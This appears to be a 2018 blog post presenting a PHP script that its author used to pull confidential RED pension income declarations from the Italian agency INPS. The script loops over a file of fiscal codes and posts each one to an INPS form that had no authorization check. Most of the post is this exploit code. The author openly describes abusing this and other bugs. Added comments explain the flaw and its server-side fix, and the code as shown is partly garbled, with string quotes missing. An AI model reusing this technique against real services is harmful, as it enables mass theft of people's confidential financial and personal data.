Friday, July 27, 2018

old script retrieve confidential data from INPS about RED

old script retrieve confidential data from INPS about RED


An old PHP script that I used to retrieve information about the RED (dichiarazione reddituale per pensionati) for each Fiscal Code.
INPS never checked authorization on the URL used to request the data (the server-side access-control check was simply missing), and I used this bug, and several others, to work faster ...
The URL doesn't work anymore and the script is so old that nobody will care about it.



<?php

// NOTE(review): the quotes around the string literals in this section appear to have been
// lost when the page was extracted, so it does not parse as shown. It is kept as published.
//
// Settings: an input file of fiscal codes (one per line), an output file, and the host and
// path of the form being requested.
// $outputfile is assigned here but nothing in this section writes to it; the only
// file_put_contents() call is commented out near the end.
$inputfile = codici.txt;
$outputfile = RED.txt;
$host = www.inps.it;
$path = /servizi/redest/Frm_MatricolaIpost.aspx;

$method = POST;

//$host = www.google.it;

// Form fields sent with every POST; the fiscal code is appended after the trailing "F00=".
$postdata = &Stampa=Esegui&F00=;

//reading codici fiscali from file
$arrcodicifiscali = getcodicifiscali($inputfile);




// One GET plus one POST per fiscal code. httpSocketConnection() as written in this file sends
// only Host, User-Agent, Content-Type, Content-Length and Connection headers: no cookie and no
// Authorization header. The fiscal code is therefore the only thing identifying the record
// being requested. The server-side fix for this class of flaw is an authorization check on
// every request that ties the requested code to the authenticated caller. Many different codes
// requested by one client in a short window is the pattern to look for in access logs.
foreach($arrcodicifiscali as $codice)
{
    //getting the page
    $resdata = httpSocketConnection($host, GET, $path, );
    $viewstatedata = ;
// keep the body of the GET response so it can be dumped next to the POST response below
$regu = $resdata[1];

    // pull the ASP.NET __VIEWSTATE hidden field out of the form markup
    if( preg_match( #name="__VIEWSTATE" value="(.*?)"#, $resdata[1], $matches) )
    {
        $viewstatedata = $matches[1];
    }
//print_r($viewstatedata);exit;

//post data with the code
// NOTE(review): $codice is concatenated as read from the file, without urlencode()
$postdatacf = $postdata . $codice;

//we need to set the VIEWSTATE
// the line that would prepend the captured __VIEWSTATE is commented out, so the value
// extracted above is never sent
//$postdatacf = __VIEWSTATE= . $viewstatedata . $postdatacf;
//echo $postdatacf; exit;
$resdata = httpSocketConnection($host,$method,$path,$postdatacf);
// debug output: the posted fields, then both response bodies. The remote markup is echoed
// without htmlspecialchars(), so a browser viewing this output renders whatever the server sent.
echo $postdatacf . ;
echo <pre> . $regu . </pre>;
// exit() inside the loop body: the script stops after the first fiscal code
echo <pre> . $resdata[1]. </pre>; exit();
}

//$resdata = httpSocketConnection($host,$method,$path,$postdata);
//file_put_contents($outputfile,$resdata);

// reached only when the input list is empty, because of the exit() inside the loop
echo ok;





//////////////////////////////////

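/**
 * Read the input file and return its non-empty lines with CR/LF removed.
 *
 * Blank lines and the empty entry a trailing newline used to produce are skipped, so the
 * caller never receives an empty code. Lines are read whole rather than in 4096-byte
 * pieces, so a long line is no longer split into several entries.
 *
 * On an unreadable file the function prints a message and terminates the script, as the
 * original did.
 *
 * @param string $inputfile path of the text file, one code per line
 * @return array list of strings, in file order
 */
function getcodicifiscali($inputfile)
{
    // Check readability explicitly instead of silencing fopen() with "@".
    if (!is_file($inputfile) || !is_readable($inputfile)) {
        echo 'cannot read the input file';
        exit();
    }

    $lines = file($inputfile, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        echo 'cannot read the input file';
        exit();
    }

    $codicifiscali = array();
    foreach ($lines as $line) {
        // FILE_IGNORE_NEW_LINES drops "\n" only; a Windows-style file still carries "\r".
        $code = str_replace(array("\r", "\n"), '', $line);
        if ($code === '') {
            continue;
        }
        $codicifiscali[] = $code;
    }

    return $codicifiscali;
}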



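/**
 * Send one HTTP/1.1 request over a plain TCP socket (port 80, no TLS) and return the response.
 *
 * For GET, a non-empty $data is appended to $path as the query string. For POST, $data is
 * sent as the request body with a matching Content-Length. Redirects are not followed: the
 * 3xx response is returned as received and the caller can inspect it with getstatuscode().
 * The earlier 302 branch issued a second request with an empty path, discarded its result
 * and could recurse without bound, so it has been removed.
 *
 * @param string $host   host name to connect to; also sent as the Host header
 * @param string $method "GET" or "POST" (case-insensitive)
 * @param string $path   request path; an empty path is sent as "/"
 * @param string $data   already URL-encoded form data
 * @return array array(0 => raw response header block, 1 => response body)
 * @throws Exception on CR/LF in $host, $method or $path, or when the socket cannot be
 *                   opened or written
 */
function httpSocketConnection($host, $method, $path = '', $data = '')
{
    $method = strtoupper($method);
    $data = (string) $data;

    if ($path === '' || $path === null) {
        $path = '/';
    }

    if ($method === 'GET' && $data !== '') {
        $path .= '?' . $data;
    }

    // These three values are written into the request line and the Host header; a CR or LF
    // inside any of them would let the caller's data add headers or a second request.
    if (preg_match('/[\r\n]/', $host . $method . $path)) {
        throw new Exception('CR/LF is not allowed in host, method or path');
    }

    $filePointer = fsockopen($host, 80, $errorNumber, $errorString);

    if (!$filePointer) {
        throw new Exception("Error $errorNumber $errorString");
    }

    try {
        $requestHeader  = $method . ' ' . $path . " HTTP/1.1\r\n";
        $requestHeader .= 'Host: ' . $host . "\r\n";
        $requestHeader .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";
        $requestHeader .= "Content-Type: application/x-www-form-urlencoded\r\n";

        if ($method === 'POST') {
            // strlen() counts bytes, which is what Content-Length requires
            $requestHeader .= 'Content-Length: ' . strlen($data) . "\r\n";
        }

        // the blank line after the last header ends the header block
        $requestHeader .= "Connection: close\r\n\r\n";

        if ($method === 'POST') {
            $requestHeader .= $data;
        }

        if (fwrite($filePointer, $requestHeader) === false) {
            throw new Exception('Error writing the request to the socket');
        }

        $responseHeader = '';
        $responseContent = '';

        // Read header lines up to the blank separator. fgets() returns false at EOF, so a
        // connection closed before the header block is complete ends the loop instead of
        // spinning forever.
        while (($line = fgets($filePointer)) !== false) {
            $responseHeader .= $line;
            if (rtrim($line, "\r\n") === '') {
                break;
            }
        }

        // header names and values are case-insensitive here
        if (stripos($responseHeader, 'Transfer-Encoding: chunked') === false) {
            $body = stream_get_contents($filePointer);
            if ($body !== false) {
                $responseContent = $body;
            }
        } else {
            $truncated = false;

            while (!$truncated && ($sizeLine = fgets($filePointer)) !== false) {
                // chunk-size line: hex length, optionally followed by ";extension"
                $sizeField = explode(';', $sizeLine, 2);
                $chunk_length = hexdec(trim($sizeField[0]));
                if ($chunk_length <= 0) {
                    break; // zero-length chunk marks the end of the body
                }

                $responseContentChunk = '';
                while (strlen($responseContentChunk) < $chunk_length) {
                    $piece = fread($filePointer, $chunk_length - strlen($responseContentChunk));
                    if ($piece === false || $piece === '') {
                        // peer closed mid-chunk: keep what arrived and stop
                        $truncated = true;
                        break;
                    }
                    $responseContentChunk .= $piece;
                }

                $responseContent .= $responseContentChunk;

                if (!$truncated) {
                    fgets($filePointer); // consume the CRLF that follows each chunk
                }
            }
        }
    } finally {
        // the socket was never closed before; release it on every path
        fclose($filePointer);
    }

    //cleaning the last parts
    $responseHeader = rtrim($responseHeader);
    $responseContent = rtrim($responseContent);

    return array($responseHeader, $responseContent);
}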

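/**
 * Extract the three-digit status code from an HTTP response's status line.
 *
 * Accepts either the raw header block as one string or an array of header lines whose
 * element 0 is the status line. Uses preg_split() in place of split(), which was removed
 * in PHP 7, and tolerates a status line without a reason phrase.
 *
 * @param string|array $myheaders raw headers or a list of header lines
 * @return string|false the status code as a string (e.g. "301"), or false when no status
 *                      line is found
 */
function getstatuscode($myheaders)
{
    //if we have the raw headers we convert them to an array
    if (is_array($myheaders) === false) {
        $myheaders = preg_split('/\r?\n/', (string) $myheaders);
    }

    // an empty array, or one without element 0, has no status line to inspect
    $statusLine = isset($myheaders[0]) ? trim((string) $myheaders[0]) : '';

    //checking the first line with the status code
    //ex. HTTP/1.1 301 Moved Permanently
    if (preg_match('#^HTTP/\d(?:\.\d)? (\d{3})(?: |$)#', $statusLine, $matches)) {
        //returning the status code
        return $matches[1];
    }

    //return false for any error
    return false;
}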


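/**
 * Collect the name/value pairs found in the Set-Cookie and Set-Cookie2 response headers.
 *
 * Accepts the raw header block as one string or an array of header lines. Parsing stops at
 * the first blank line, which ends the header block. Header names are matched
 * case-insensitively, lines without a colon (the status line) are skipped, and names and
 * values are trimmed.
 *
 * The cookie itself and its attributes (domain, expires, path, ...) are returned in one
 * flat list, so the result does not record which attributes belong to which cookie.
 * Valueless attributes such as HttpOnly or Secure come back with an empty value.
 *
 * @param string|array $myheaders raw headers or a list of header lines
 * @return array list of array(0 => name, 1 => value) pairs, in header order
 */
function cookieJar($myheaders)
{
    /*
    Example of the header block this function was written against:

    Date: Thu, 30 Jul 2009 16:41:36 GMT
    Server: Microsoft-IIS/6.0
    P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
    S:: 04
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Pragma: no-cache
    Location: http://it.msn.com/
    Set-Cookie: MC1=V=3&GUID=351aadd02c2c4c6a943829592de783dd; domain=.msn.it; expires=Mon, 04-Oct-2021 11:00:00 GMT; path=/
    Cache-Control: no-cache
    Content-Length: 0
    */

    //if we have the raw headers we convert them to an array
    if (is_array($myheaders) === false) {
        // preg_split() replaces split(), which was removed in PHP 7
        $myheaders = preg_split('/\r?\n/', (string) $myheaders);
    }

    $MycookieJar = array();

    foreach ($myheaders as $line) {
        $line = trim((string) $line);
        if ($line === '') {
            break; // end of the header block
        }
        if (strpos($line, ':') === false) {
            continue; // status line or malformed header: nothing to split
        }

        list($header, $value) = explode(':', $line, 2);
        $header = strtolower(trim($header));

        if ($header !== 'set-cookie' && $header !== 'set-cookie2') {
            continue;
        }

        // v2 cookies: one header may carry several comma-separated cookies. A v1 header is
        // left whole because its expires attribute contains a comma.
        $cookies = ($header === 'set-cookie2') ? explode(',', $value) : array($value);

        foreach ($cookies as $cookie) {
            foreach (explode(';', $cookie) as $part) {
                $part = trim($part);
                if ($part === '') {
                    continue;
                }
                $pair = explode('=', $part, 2);
                $MycookieJar[] = array(
                    trim($pair[0]),
                    isset($pair[1]) ? trim($pair[1]) : '',
                );
            }
        }
    }

    return $MycookieJar;
}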
?>

